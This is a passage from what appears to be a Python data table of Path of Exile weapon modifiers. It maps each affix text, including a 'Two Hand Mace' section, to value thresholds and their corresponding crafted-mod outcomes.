"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (2 - 3) to (4 - 5) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(120, 'Adds (5 - 8) to (11 - 18) Cold Damage'), (240, 'Adds (9 - 15) to (19 - 28) Cold Damage'), (300, 'Adds (16 - 22) to (29 - 39) Cold Damage'), (360, 'Adds (23 - 30) to (40 - 53) Cold Damage'), (1000, 'Adds (31 - 37) to (44 - 65) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(150, 'Adds (7 - 12) to (13 - 21) Fire Damage'), (300, 'Adds (13 - 19) to (22 - 35) Fire Damage'), (375, 'Adds (20 - 27) to (36 - 48) Fire Damage'), (450, 'Adds (28 - 35) to (49 - 64) Fire Damage'), (1000, 'Adds (36 - 45) to (65 - 80) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(200, 'Adds 1 to (25 - 40) Lightning Damage'), (400, 'Adds (1 - 3) to (41 - 65) Lightning Damage'), (550, 'Adds (2 - 5) to (66 - 82) Lightning Damage'), (650, 'Adds (2 - 7) to (83 - 106) Lightning Damage'), (1000, 'Adds (3 - 9) to (107 - 125) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Two Hand Mace": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(44, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(56, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Endurance Charges')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (2 - 3) to (4 - 5) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(120, 'Adds (5 - 8) to (11 - 18) Cold Damage'), (240, 'Adds (9 - 15) to (19 - 28) Cold Damage'), (300, 'Adds (16 - 22) to (29 - 39) Cold Damage'), (360, 'Adds (23 - 30) to (40 - 53) Cold Damage'), (1000, 'Adds (31 - 37) to (44 - 65) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(150, 'Adds (7 - 12) to (13 - 21) Fire Damage'), (300, 'Adds (13 - 19) to (22 - 35) Fire Damage'), (375, 'Adds (20 - 27) to (36 - 48) Fire Damage'), (450, 'Adds (28 - 35) to (49 - 64) Fire Damage'), (1000, 'Adds (36 - 45) to (65 - 80) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(200, 'Adds 1 to (25 - 40) Lightning Damage'), (400, 'Adds (1 - 3) to (41 - 65) Lightning Damage'), (550, 'Adds (2 - 5) to (66 - 82) Lightning Damage'), (650, 'Adds (2 - 7) to (83 - 106) Lightning Damage'), (1000, 'Adds (3 - 9) to (107 - 125) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
